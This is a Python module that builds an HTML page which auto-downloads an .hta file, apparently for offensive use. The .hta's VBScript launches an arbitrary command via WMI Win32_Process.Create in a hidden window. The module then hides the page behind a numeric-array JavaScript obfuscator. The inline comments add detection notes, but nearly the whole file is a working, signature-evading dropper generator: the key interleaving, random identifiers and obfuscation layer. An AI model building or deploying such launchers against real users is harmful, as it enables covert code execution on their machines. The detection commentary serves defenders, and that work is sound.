# -*- coding: utf-8 -*-
# sfhta.py -- string templating for an HTML "launcher" page that drops an
# .hta file whose VBScript starts a command through WMI
# (Win32_Process.Create). The Python here is plain string assembly; the
# behaviour worth understanding is in the embedded VBScript/JavaScript,
# which is annotated inline below.
#
# For detection purposes the artefacts this module emits have a fixed shape
# regardless of the randomised identifiers: an HTML page that atob()-decodes
# a base64 string into an .hta and triggers its download via
# msSaveBlob / createObjectURL + <a download>, and an HTA that instantiates
# "WbemScripting.SWbemLocator" and calls Win32_Process.Create from
# window_onload.
import random
import string
import base64

def randomString():
    """Return 12 random ASCII letters.

    Only used to name the variables inside the generated VBScript/JS so
    that each build differs textually. `random` is not a CSPRNG; that is
    acceptable here because nothing secret is derived from these names.
    """
    return ''.join([random.choice(string.ascii_letters) for n in range(12)])

def generateKey():
    """Return a random permutation of an 18-character punctuation set.

    generateBase() splices this key between every character of the command
    and the generated VBScript strips it again at runtime with Replace(), so
    the command string does not appear contiguously in the .hta. A static
    signature should therefore target the surrounding structure (the
    Replace(..., key, "") call, SWbemLocator, Win32_Process) rather than the
    command text.
    """
    keys = "!#+%&/()=?_-*[]$><"
    return ''.join(random.sample(keys,len(keys)))

def generateBase(htaCommand, htaFileName):
    """Build the HTML launcher page for ``htaCommand``.

    Args:
        htaCommand: command line handed to Win32_Process.Create inside the
            generated .hta.
        htaFileName: base name (no extension) of the dropped
            ``<htaFileName>.hta``. It is inserted into a JS string literal
            unescaped, so it must not contain quotes.

    Returns:
        The launcher HTML as a str (before obfuscateHta()).
    """
    htaKey = generateKey()
    # Interleave the key between every character of the command
    # (htaCommand[i:i+1] is just htaCommand[i] as a one-character str).
    # Inside a VBScript string literal a double quote is written as two
    # double quotes, hence the "\"" -> "\"\"" replacement; the key itself
    # contains no quote characters, so it needs no such treatment.
    if "\"" in htaCommand:
        htaPayload = htaKey.join([htaCommand[i:i+1] for i in range(0, len(htaCommand), 1)]).replace("\"", "\"\"")
    else:
        htaPayload = htaKey.join([htaCommand[i:i+1] for i in range(0, len(htaCommand), 1)])

    # VBScript body of the .hta. Placeholders {0}-{6} become random
    # identifiers via str.format below (eight names are generated; the
    # eighth is unreferenced and silently ignored by format). In order:
    #   SWbemLocator.ConnectServer()          -> WMI connection to the
    #                                            local machine
    #   Security_.ImpersonationLevel = 3      -> wbemImpersonationLevelImpersonate
    #   Win32_ProcessStartup.ShowWindow = 12  -> window-state hint for the
    #                                            new process; presumably
    #                                            meant to keep it out of
    #                                            view -- verify against the
    #                                            SW_* constants
    #   Win32_Process.Create(cmd, NULL, startup, pid)
    #                                         -> starts the command; {6}
    #                                            receives the return code,
    #                                            {5} the new process id
    # Replace(payload, key, "") reassembles the command at runtime from the
    # interleaved form built above.
    # NOTE(review): processes created via Win32_Process.Create are
    # generally parented by the WMI provider host rather than by mshta.exe,
    # which matters when writing process-tree detections for this output.
    baseHta = '''<script language="VBScript">
Sub window_onload
Set {0} = CreateObject("WbemScripting.SWbemLocator")
Set {1} = {0}.ConnectServer()
{1}.Security_.ImpersonationLevel=3
Set {2} = {1}.Get("Win32_ProcessStartup")
Set {3} = {2}.SpawnInstance_
{3}.ShowWindow = 12
Set {4} = {1}.Get("Win32_Process")
{6} = {4}.Create(Replace("'''+htaPayload+'''", "'''+htaKey+'''", ""), NULL, {3}, {5})
window.close()
End Sub
</script>'''

    # HTML launcher. The finished .hta is base64-encoded into a JS string,
    # decoded in the browser with atob(), wrapped in a Blob and pushed to
    # the user as a download named <htaFileName>.hta (navigator.msSaveBlob
    # where available, otherwise createObjectURL + a synthetic click on an
    # <a download> element). Doubled braces ({{ }}) are literal JS braces
    # escaped for str.format; {0}-{4} are random identifiers.
    # Observations: the Blob type 'plain/text' is not a registered media
    # type (text/plain would be), and the markup closes a <body> it never
    # opened. Neither affects what the page does.
    launcherBase = '''<html><head><script type="text/javascript">var {0} = atob("'''+base64.b64encode(baseHta.format(randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString()).encode()).decode()+'''");var {1} = "'''+htaFileName+'''.hta";var {2} = new Blob([{0}], {{type: 'plain/text;charset=utf-8;'}});var {3} = null;if (navigator.msSaveBlob) {{{3} = navigator.msSaveBlob({2}, {1});}} else {{{3} = window.URL.createObjectURL({2});}}var {4} = document.createElement('a');{4}.href = {3};{4}.setAttribute('download', {1});document.body.appendChild({4});{4}.click();document.body.removeChild({4});</script></head></body></html>'''
    launcherFinal = launcherBase.format(randomString(), randomString(), randomString(), randomString(), randomString())
    return launcherFinal
# Module-level `cdata` is never read: obfuscateHta() rebinds a local of the
# same name before any use, so this assignment is dead.
cdata = " "
def obfuscateHta(launcherFinal):
    """Wrap the launcher HTML in a numeric-array obfuscation layer.

    Each character of ``launcherFinal`` is taken as its code point; the
    code points are packed four at a time into one base-256 integer each
    and emitted as ``var <a>=new Array;<a>[0]=...;<a>[1]=...;``. A JS
    decoder appended at the end splits every integer back into characters
    with Math.pow(<expr>, k), where <expr> is an arithmetic expression that
    folds to 256, and document.write()s the reconstructed HTML.

    Args:
        launcherFinal: the HTML returned by generateBase().

    Returns:
        The obfuscated HTML as a str; placeholders {0}-{2} are filled with
        random identifiers by the final str.format call.

    Detection note: the output shape -- an integer array, a
    String.fromCharCode loop keyed on a constant-folding expression, and
    document.write -- is stable across builds even though the identifiers
    and the numbers change, so it is a better static match than any
    particular value.
    """
    finalPayload = "<html><body><head><script type=\"text/javascript\">var {0}=new Array;"
    stcData = []
    i = 0
    cdata = " "
    # Collect the decimal code point of every character as a string.
    # list(launcherFinal) is rebuilt on every iteration (quadratic, but
    # harmless at these sizes) and the if/else branches are identical, so
    # the loop is equivalent to [str(ord(c)) for c in launcherFinal].
    while i < len(list(launcherFinal)):
        stringToChar = ord(list(list(launcherFinal))[i])
        i+=1
        if i != len(list(launcherFinal)) - 0:
            stcData.append(str(stringToChar))
        else:
            stcData.append(str(stringToChar))
    deep = len(stcData)
    # Packing. Note the `=+` on the second and third lines of each group:
    # it parses as `code = +(...)`, not `code += ...`. Because the
    # right-hand side already contains `code`, the net effect is
    #     code = ((c0*256 + c1)*256 + c2)*256 + c3
    # computed with true division, so under Python 3 `code` becomes a float
    # and str(code) yields e.g. "1234567.0" -- still a valid JS numeral,
    # and every intermediate stays far below 2**53, so no precision is
    # lost. The value of deep % 4 selects how the 1-3 trailing characters
    # are packed.
    if deep % 4 == 0:
        i = 0
        x = -1
        while i < deep:
            code = (int(stcData[i]) * 256 + int(stcData[i+1]))
            code =+ ((code * 256 ** 2) / 256 + int(stcData[i+2]))
            code =+ ((code * 256 ** 3) / 256 ** 2 + int(stcData[i+3]))
            i += 4
            x +=1
            finalPayload += "{0}["+ str(x) + "]=" + str(code) + ";"
    elif deep % 4 == 3:
        # Three-character tail, packed as c0*65536 + c1*256 + c2.
        cdata = stcData [deep - 3:deep]
        ndata = stcData [0:deep - 3]
        i = 0
        x = -1
        while i < deep - 3:
            code = (int(ndata[i]) * 256 + int(ndata[i+1]))
            code =+ ((code * 256 ** 2) / 256 + int(ndata[i+2]))
            code =+ ((code * 256 ** 3) / 256 ** 2 + int(ndata[i+3]))
            i += 4
            x +=1
            finalPayload += "{0}["+ str(x) + "]=" + str(code) + ";"
        ccode = (int(cdata[0]) * 256 + int(cdata[1]))
        ccode =+ ((ccode * 256 ** 2) / 256 + int(cdata[2]))
        finalPayload += "{0}["+ str(x + 1) + "]=" + str(ccode) + ";"
    elif deep % 4 == 2:
        # Two-character tail, packed as c0*256 + c1 (stays an int here).
        cdata = stcData [deep - 2:deep]
        ndata = stcData [0:deep - 2]
        i = 0
        x = -1
        while i < deep - 2:
            code = (int(ndata[i]) * 256 + int(ndata[i+1]))
            code =+ ((code * 256 ** 2) / 256 + int(ndata[i+2]))
            code =+ ((code * 256 ** 3) / 256 ** 2 + int(ndata[i+3]))
            i += 4
            x +=1
            finalPayload +="{0}["+ str(x) + "]=" + str(code) + ";"
        ccode = (int(cdata[0]) * 256 + int(cdata[1]))
        finalPayload +="{0}["+ str(x + 1) + "]=" + str(ccode) + ";"
    elif deep % 4 == 1:
        # One-character tail: `cdata` is sliced but never emitted, so the
        # last character of launcherFinal (the ">" of "</html>") is dropped
        # whenever len(launcherFinal) % 4 == 1.
        cdata = stcData [deep - 1:deep]
        ndata = stcData [0:deep - 1]
        i = 0
        x = -1
        while i < deep - 1:
            code = (int(ndata[i]) * 256 + int(ndata[i+1]))
            code =+ ((code * 256 ** 2) / 256 + int(ndata[i+2]))
            code =+ ((code * 256 ** 3) / 256 ** 2 + int(ndata[i+3]))
            i += 4
            x +=1
            finalPayload +="{0}["+ str(x) + "]=" + str(code) + ";"

    # JS decoder. Every Math.pow(<expr>, k) uses the same <expr>,
    # (2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35, which
    # evaluates to 256. For k = 3, 2, 1, 0 it appends
    # String.fromCharCode(floor(v / 256**k)) when that digit is > 0 and
    # then subtracts the digit out of v. The `> 0` guard also skips a zero
    # byte, which never occurs in the launcher. The loop body is a single
    # comma expression (no braces, which would otherwise need escaping for
    # str.format); `{2}` is assigned without `var`, i.e. an implicit global
    # in sloppy mode.
    finalPayload +="var {1}=\"\";for(i=0;i<{0}.length;i++){2}={0}[i],Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,3))>0&&({1}+=String.fromCharCode(Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,3)))),{2}-=Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,3))*Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,3),Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,2))>0&&({1}+=String.fromCharCode(Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,2)))),{2}-=Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,2))*Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,2),Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,1))>0&&({1}+=String.fromCharCode(Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,1)))),{2}-=Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,1))*Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,1),Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,0))>0&&({1}+=String.fromCharCode(Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,0))));document.write({1});</script></head></body></html>"
    return finalPayload.format(randomString(), randomString(), randomString())